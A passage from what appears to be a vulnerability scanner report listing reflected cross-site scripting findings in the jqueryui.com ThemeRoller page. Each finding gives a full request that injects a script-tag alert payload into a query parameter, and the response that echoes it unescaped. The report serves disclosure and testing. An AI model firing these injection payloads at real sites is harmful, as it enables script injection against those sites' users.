1_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:54 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
erColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=66666648a1c"><script>alert(1)</script>c4245844e06&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_s
...[SNIP]...

3.60. http://jqueryui.com/themeroller/ [iconColorDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2216b"><script>alert(1)</script>cae83cdb21e was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF2216b"><script>alert(1)</script>cae83cdb21e&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:01 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
nt=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF2216b"><script>alert(1)</script>cae83cdb21e&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgO
...[SNIP]...

3.61. http://jqueryui.com/themeroller/ [iconColorError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa094"><script>alert(1)</script>fb9a666b652 was submitted in the iconColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000fa094"><script>alert(1)</script>fb9a666b652&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:23 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
orderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000fa094"><script>alert(1)</script>fb9a666b652&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px
...[SNIP]...

3.62. http://jqueryui.com/themeroller/ [iconColorHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2df0"><script>alert(1)</script>9d2ae49d906 was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFFa2df0"><script>alert(1)</script>9d2ae49d906&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:41 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFFa2df0"><script>alert(1)</script>9d2ae49d906&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.p
...[SNIP]...

3.63. http://jqueryui.com/themeroller/ [iconColorHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa12d"><script>alert(1)</script>5d0fca062f4 was submitted in the iconColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000aa12d"><script>alert(1)</script>5d0fca062f4&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:19 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000aa12d"><script>alert(1)</script>5d0fca062f4&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay
...[SNIP]...

3.64. http://jqueryui.com/themeroller/ [iconColorHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df741"><script>alert(1)</script>1018a4cb3c8 was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFFdf741"><script>alert(1)</script>1018a4cb3c8&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
erColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFFdf741"><script>alert(1)</script>1018a4cb3c8&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_so
...[SNIP]...

3.65. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 795c1"><script>alert(1)</script>41c916c7e5d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?795c1"><script>alert(1)</script>41c916c7e5d=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:12 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 117121

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&795c1"><script>alert(1)</script>41c916c7e5d=1" type="text/css" media="all" />
...[SNIP]...

3.66. http://jqueryui.com/themeroller/ [offsetLeftShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the offsetLeftShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3efe"><script>alert(1)</script>2f5dc1da704 was submitted in the offsetLeftShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2pxa3efe"><script>alert(1)</script>2f5dc1da704&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2pxa3efe"><script>alert(1)</script>2f5dc1da704&cornerRadiusShadow=7px*//*" type="text/css" media="all" />
...[SNIP]...

3.67. http://jqueryui.com/themeroller/ [offsetTopShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the offsetTopShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac264"><script>alert(1)</script>4256cccd365 was submitted in the offsetTopShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2pxac264"><script>alert(1)</script>4256cccd365&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
0&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2pxac264"><script>alert(1)</script>4256cccd365&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//*" type="text/css" media="all" />
...[SNIP]...

3.68. http://jqueryui.com/themeroller/ [opacityOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the opacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d0f5"><script>alert(1)</script>ac92bb32d23 was submitted in the opacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=354d0f5"><script>alert(1)</script>ac92bb32d23&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=354d0f5"><script>alert(1)</script>ac92bb32d23&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//*" type="text/css" med
...[SNIP]...

3.69. http://jqueryui.com/themeroller/ [opacityShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the opacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8712f"><script>alert(1)</script>835a86cc92c was submitted in the opacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

